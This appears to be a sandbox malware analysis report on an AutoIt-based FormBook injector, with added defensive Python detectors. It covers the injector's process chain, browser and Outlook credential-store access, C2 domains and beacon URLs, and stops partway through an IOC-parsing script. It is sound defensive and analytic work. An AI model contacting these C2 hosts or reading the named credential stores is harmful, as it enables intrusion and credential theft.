          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00434418
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0043333C mouse_event,mouse_event | 0_2_0043333C
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
          Source: C:\Windows\SysWOW64\choice.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_00446124
          Source: 8EhMjL3yNF.exe, SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: 8EhMjL3yNF.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: yProgram Manager
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004720DB GetLocalTime,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW | 0_2_004720DB
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00472C3F GetUserNameW | 0_2_00472C3F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0041E364 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte | 0_2_0041E364
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary | 0_2_0040E500

          Stealing of Sensitive Information

          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
Source: 8EhMjL3yNF.exe | Binary or memory string: WIN_XP
Source: 8EhMjL3yNF.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: 8EhMjL3yNF.exe | Binary or memory string: WIN_XPe
Source: 8EhMjL3yNF.exe | Binary or memory string: WIN_VISTA
Source: 8EhMjL3yNF.exe | Binary or memory string: WIN_7
Source: 8EhMjL3yNF.exe | Binary or memory string: WIN_8
Note: the OS-version tokens (WIN_2000 through WIN_8) and the long string table above, which contains "AutoIt v3 GUI" and the AutoIt control-command names (ISVISIBLE, GETCURRENTSELECTION, ...), are the AutoIt v3 runtime's own strings; this is consistent with the ReversingLabs label Win32.Trojan.Autoitinject in the antivirus table, i.e. an AutoIt-compiled loader that injects the FormBook payload rather than FormBook itself being the on-disk file.
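The file and registry opens listed under this section all come from choice.exe, a console utility that has no reason to read Chromium credential stores or the Outlook MAPI profile key; that mismatch between image and artifact is the detection opportunity. The Python below is an added example written for this page, not code from the Joe Sandbox report or any vendor's detection content. It flags any non-browser image opening the artifacts the report names (Login Data, Web Data, Cookies, Local State under a Chrome or Edge profile directory) and any non-Outlook image opening the profile key, then rates a process higher when it touches more than one store. The event records are constructed in a Sysmon-like shape; their field names (pid, type, image, target) are this example's own assumption.

```python
import re
from collections import defaultdict

# Added example, not part of the Joe Sandbox report. Event field names below are
# an assumption of this example, not a Joe Sandbox or Sysmon schema.

# Artifact names the report lists, matched under any Chromium profile directory.
# The sample opened both "Default\Local State" and "Default\Network\Local State",
# so any number of directory segments between "User Data" and the file is allowed.
CHROMIUM_STORE_RE = re.compile(
    r"\\(google\\chrome|microsoft\\edge)\\user data\\(?:[^\\]+\\)*"
    r"(login data|web data|cookies|local state)$"
)
# Registry key the report shows choice.exe opening (MAPI profile store for Outlook).
MAIL_PROFILE_KEY = (
    "hkey_current_user\\software\\microsoft\\windows nt\\currentversion"
    "\\windows messaging subsystem\\profiles\\outlook"
)
# Images allowed to read their own stores; anything else touching them is a finding.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}
MAIL_IMAGES = {"outlook.exe"}


def _image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return (rule, image, artifact) for a suspicious event, else None."""
    image = _image_name(event["image"])
    target = event["target"].lower()
    if event["type"] == "file_open":
        m = CHROMIUM_STORE_RE.search(target)
        if m and image not in BROWSER_IMAGES:
            return ("browser_credential_store_read", image, m.group(2))
    elif event["type"] == "reg_open":
        if target.rstrip("\\").startswith(MAIL_PROFILE_KEY) and image not in MAIL_IMAGES:
            return ("mail_profile_read", image, "outlook profile")
    return None


def score_process(events):
    """Group findings per pid. A process that trips more than one rule or reads
    more than one artifact is rated high; a single touch is rated medium."""
    per_pid = defaultdict(list)
    for ev in events:
        finding = classify_event(ev)
        if finding:
            per_pid[ev["pid"]].append(finding)
    report = {}
    for pid, findings in per_pid.items():
        rules = {f[0] for f in findings}
        artifacts = {f[2] for f in findings}
        severity = "high" if len(rules) > 1 or len(artifacts) > 1 else "medium"
        report[pid] = {"image": findings[0][1], "severity": severity,
                       "artifacts": sorted(artifacts)}
    return report


# Constructed sample telemetry: pid 4120 mirrors the report's choice.exe behaviour,
# pid 3000 is a browser reading its own store, pid 900 is unrelated file activity.
SAMPLE_EVENTS = [
    {"pid": 4120, "type": "file_open", "image": "C:\\Windows\\SysWOW64\\choice.exe",
     "target": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"pid": 4120, "type": "file_open", "image": "C:\\Windows\\SysWOW64\\choice.exe",
     "target": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies"},
    {"pid": 4120, "type": "reg_open", "image": "C:\\Windows\\SysWOW64\\choice.exe",
     "target": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
               "\\Windows Messaging Subsystem\\Profiles\\Outlook\\"},
    {"pid": 3000, "type": "file_open",
     "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "target": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"pid": 900, "type": "file_open", "image": "C:\\Windows\\explorer.exe",
     "target": "C:\\Users\\user\\Desktop\\notes.txt"},
]

if __name__ == "__main__":
    for pid, info in score_process(SAMPLE_EVENTS).items():
        print(pid, info)
```

The allow-list is deliberately short: on a real endpoint you would extend BROWSER_IMAGES with the installed browsers' signed binaries and key the lookup on image path and signer rather than on file name alone, since the report shows the same stores being read by a legitimate Windows binary (choice.exe) running injected code.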

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0046CEF3 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
MITRE ATT&CK matrix (the navigator grid did not survive extraction; listed here are the techniques the report highlights, grouped by tactic, with the badge value the grid shows next to each technique in parentheses; un-highlighted cells are omitted)

Reconnaissance: none highlighted
Resource Development: none highlighted
Initial Access: Valid Accounts (2)
Execution: Native API (2)
Persistence: DLL Side-Loading (1); Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21)
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: none highlighted
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Exfiltration: none highlighted
Impact: System Shutdown/Reboot (1)
Behavior graph (ID 1529811, sample 8EhMjL3yNF.exe, start date 09/10/2024, architecture Windows, score 100)

Top-level network nodes: www.sealofsea.xyz, www.languyenthuyduyen.xyz, and 25 other IPs or domains. Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 3 other signatures. "Performs DNS queries to domains with low reputation" is attached to www.languyenthuyduyen.xyz.

Process chain:
8EhMjL3yNF.exe (started)
  signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> svchost.exe (started)
     signatures: Maps a DLL or memory area into another process
     -> SjhnWvlTMw.exe (injected)
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> choice.exe (started)
           signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> SjhnWvlTMw.exe (injected)
              signatures: Found direct / indirect Syscall (likely to bypass EDR)
              network: www.languyenthuyduyen.xyz 103.255.237.233, ports 49826, 49827, 49828 (VNPT-AS-VNVNPTCorpVN, Viet Nam); agilizeimob.app 84.32.84.32, ports 49862, 49863, 49864 (NTT-LT-ASLT, Lithuania); 10 other IPs or domains
           -> firefox.exe (started)
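The chain in the graph (a user-directory executable starting svchost.exe, svchost.exe injecting into SjhnWvlTMw.exe, an injected process starting choice.exe, and choice.exe both injecting and starting firefox.exe) is exactly what process-lineage rules should catch, independent of the payload's Yara signature. The Python below is an added example written for this page, not part of the Joe Sandbox report or any vendor's detection content. The event records are constructed to mirror the graph, reusing its node numbers as pids; their field names (type, pid, ppid, image, target_pid) are this example's own assumption. It goes slightly beyond the graph by including a benign services.exe -> svchost.exe pair so the svchost rule has a case that must stay quiet.

```python
from collections import defaultdict

# Added example, not part of the Joe Sandbox report. Event field names are an
# assumption of this example.

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Console utilities that should never spawn children or inject into anything.
LEAF_UTILITIES = {"choice.exe"}
# On a healthy system svchost.exe is only ever started by services.exe.
SERVICE_HOST_PARENT = "services.exe"


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def in_user_dir(path):
    return path.lower().startswith("c:\\users\\")


def evaluate(events):
    """Return {pid: [rule, ...]} for every process that trips a lineage rule."""
    procs = {ev["pid"]: ev for ev in events if ev["type"] == "create"}
    injected = {ev["target_pid"] for ev in events if ev["type"] == "inject"}
    findings = defaultdict(list)
    for pid, ev in procs.items():
        name = image_name(ev["image"])
        parent = procs.get(ev["ppid"])
        parent_name = image_name(parent["image"]) if parent else None
        # R1: svchost.exe with any parent other than services.exe.
        if name == "svchost.exe" and parent_name != SERVICE_HOST_PARENT:
            findings[pid].append("svchost_not_started_by_services")
        # R2: a console utility spawning anything at all (attributed to the parent).
        if parent_name in LEAF_UTILITIES:
            findings[ev["ppid"]].append("console_utility_spawned_" + name)
        # R3: child of a process that was itself an injection target.
        if ev["ppid"] in injected:
            findings[pid].append("started_by_injected_process")
        # R4: a system binary whose ancestry passes through a user-writable directory.
        if in_system_dir(ev["image"]):
            anc = parent
            while anc is not None:
                if in_user_dir(anc["image"]):
                    findings[pid].append("system_binary_descends_from_user_dir")
                    break
                anc = procs.get(anc["ppid"])
    # R5: the injection source itself is a console utility.
    for ev in events:
        if ev["type"] == "inject":
            src = procs.get(ev["pid"])
            if src and image_name(src["image"]) in LEAF_UTILITIES:
                findings[ev["pid"]].append("console_utility_injected")
    return dict(findings)


# Constructed events mirroring the behavior graph; node numbers reused as pids.
# SjhnWvlTMw.exe (pid 16) pre-exists and is only ever an injection target, so it
# has no create event here, which is how it would look in real telemetry too.
SAMPLE_EVENTS = [
    {"type": "create", "pid": 10, "ppid": 2, "image": "C:\\Users\\user\\Desktop\\8EhMjL3yNF.exe"},
    {"type": "create", "pid": 13, "ppid": 10, "image": "C:\\Windows\\SysWOW64\\svchost.exe"},
    {"type": "inject", "pid": 13, "target_pid": 16},      # svchost.exe -> SjhnWvlTMw.exe
    {"type": "create", "pid": 19, "ppid": 16, "image": "C:\\Windows\\SysWOW64\\choice.exe"},
    {"type": "inject", "pid": 19, "target_pid": 16},      # choice.exe -> SjhnWvlTMw.exe
    {"type": "create", "pid": 26, "ppid": 19,
     "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe"},
    # benign control pair: services.exe starting svchost.exe
    {"type": "create", "pid": 700, "ppid": 600, "image": "C:\\Windows\\System32\\services.exe"},
    {"type": "create", "pid": 800, "ppid": 700, "image": "C:\\Windows\\System32\\svchost.exe"},
]

if __name__ == "__main__":
    for pid, rules in evaluate(SAMPLE_EVENTS).items():
        print(pid, rules)
```

Rules R1 and R4 fire on the svchost.exe node, R2, R3 and R5 on the choice.exe node; the benign svchost.exe started by services.exe produces nothing. Note that the injected SjhnWvlTMw.exe process never trips a rule on its own, because it was not created by the chain: the injection events are what tie it in, so telemetry that records remote-thread or APC injection (the report lists both "Queues an APC in another process" and "Modifies the context of a thread in another process") is required for R3 and R5.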

Source | Detection | Scanner | Label | Link
8EhMjL3yNF.exe | 100% | Avira | HEUR/AGEN.1321671 |
8EhMjL3yNF.exe | 58% | ReversingLabs | Win32.Trojan.Autoitinject |
8EhMjL3yNF.exe | 100% | Joe Sandbox ML | |
No antivirus matches in the report's remaining antivirus tables.
Name | IP | Active | Malicious | Reputation
(no antivirus detection is recorded for any entry)
www.languyenthuyduyen.xyz | 103.255.237.233 | true | true | unknown
www.ntn.solar | 199.59.243.227 | true | true | unknown
asociacia.online | 81.2.196.19 | true | true | unknown
mybartendinglife.club | 3.33.130.190 | true | true | unknown
technew.shop | 45.56.219.238 | true | true | unknown
thepeatear.online | 84.32.84.32 | true | true | unknown
www.firstcry.shop | 13.248.169.48 | true | true | unknown
shops.myshopify.com | 23.227.38.74 | true | true | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | true | unknown
doggieradio.net | 3.33.130.190 | true | true | unknown
www.allpop.xyz | 162.0.238.43 | true | true | unknown
agilizeimob.app | 84.32.84.32 | true | true | unknown
030002304.xyz | 65.21.196.90 | true | true | unknown
www.kx507981.shop | 54.67.42.145 | true | true | unknown
www.bayarcepat19.click | 104.21.77.69 | true | true | unknown
teerra.shop | 3.33.130.190 | true | true | unknown
www.mybartendinglife.club | unknown | unknown | true | unknown
www.030002304.xyz | unknown | unknown | true | unknown
www.sealofsea.xyz | unknown | unknown | true | unknown
www.thepeatear.online | unknown | unknown | true | unknown
www.doggieradio.net | unknown | unknown | true | unknown
www.agilizeimob.app | unknown | unknown | true | unknown
www.zingara.life | unknown | unknown | true | unknown
www.technew.shop | unknown | unknown | true | unknown
www.asociacia.online | unknown | unknown | true | unknown
www.teerra.shop | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
Every URL below is marked Malicious: true, with no antivirus detection and Reputation: unknown.
http://www.technew.shop/n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs=
http://www.doggieradio.net/0r1y/
http://www.firstcry.shop/2mvq/?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P
http://www.mybartendinglife.club/sfkd/
http://www.bayarcepat19.click/x7ji/
http://www.thepeatear.online/1jig/
http://www.mybartendinglife.club/sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8=
http://www.kx507981.shop/7cee/?nhl=LO11cYuPDN+V6ulgbSQlbQhpKz952Uhe3dYdUk54a5ewrOC/uvvn5bRLfbUUmCEUWVML7qGOWOxZJM3qSQiiVpBT5y4/s1qW1sM6t7L30BdH3o50b80t3Z0=&9X=EvKH2xeP-DpP307P
http://www.languyenthuyduyen.xyz/zxna/
http://www.030002304.xyz/f06i/?9X=EvKH2xeP-DpP307P&nhl=g1MS1+fiN19fuwYlcBKOU4UzmmsLW0eBYO/90R9nimGtqEGAgI0kE5yyF7WRrE+n+De2SPMKz1ZHlS6i60EYe6+HnhjgGN2ua7X3RkxuKgzxjrOTLKTNX9U=
http://www.zingara.life/c0mi/?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y=
http://www.teerra.shop/77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P
http://www.firstcry.shop/2mvq/
http://www.030002304.xyz/f06i/
http://www.agilizeimob.app/51t8/
http://www.technew.shop/n2yx/
http://www.doggieradio.net/0r1y/?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P
http://www.ntn.solar/udtr/?nhl=JWRCMib9Ab6yKGK9tVnY1k7oTlzf3FlCZv+JaD8ekJd2eSGus8uX9j1aomNbYcA4VfgdKRJwSCfsWTeuLYlP9NwC5xq+bIEo1S2z3eaxb1ZDoYcdhdFludY=&9X=EvKH2xeP-DpP307P
http://www.teerra.shop/77wx/
http://www.sealofsea.xyz/a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY=
http://www.kx507981.shop/7cee/
http://www.languyenthuyduyen.xyz/zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4=
http://www.zingara.life/c0mi/
http://www.allpop.xyz/w6me/?nhl=ZQVtGrOiyfGmX0Bj7aOLb6McZZRaKXEecgRoMf1rX1qYBYk54P5+D+BVBTSMCHRrFOCnGQPC2mKGS9yi7bLDo6yarw5+jQ0DwziRuqiIpXFZxXsIN5XtUDU=&9X=EvKH2xeP-DpP307P
http://www.agilizeimob.app/51t8/?nhl=m7B14gWZ3tTp+Si7ZmYNMzAQVPiIRhKeZLAtkzFkwSvyWpqHTy62LwfcTz9vRoaiRTwb/KbEqTho7SSr6qx+JXj6A7Si0P86LNCZt8nEBft2KH0FBAqzAzY=&9X=EvKH2xeP-DpP307P
http://www.allpop.xyz/w6me/
http://www.ntn.solar/udtr/
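Every flagged URL above follows the same shape: a four-character path segment, the fixed query value 9X=EvKH2xeP-DpP307P, and an opaque base64-like nhl blob, with the bare path form also requested for each host. The Python below is an added example written for this page, not code from the Joe Sandbox report: it parses that shape out of the URL list, keeping the blob raw (urllib's parse_qs would turn its "+" into a space), and joins the hosts against the domain/IP table earlier on the page so shared hosting becomes visible. The URL and IP lists are copied from the report; nothing is resolved or fetched. Looking a www. host up by its bare apex when the report resolved only the apex is this example's assumption.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Added example, not part of the Joe Sandbox report. Inputs are copied from the
# report's URL and domain tables; no network activity.

# Subset of the flagged URLs, enough to show every observed form.
FLAGGED_URLS = [
    "http://www.technew.shop/n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs=",
    "http://www.doggieradio.net/0r1y/",
    "http://www.mybartendinglife.club/sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8=",
    "http://www.thepeatear.online/1jig/",
    "http://www.teerra.shop/77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P",
    "http://www.agilizeimob.app/51t8/",
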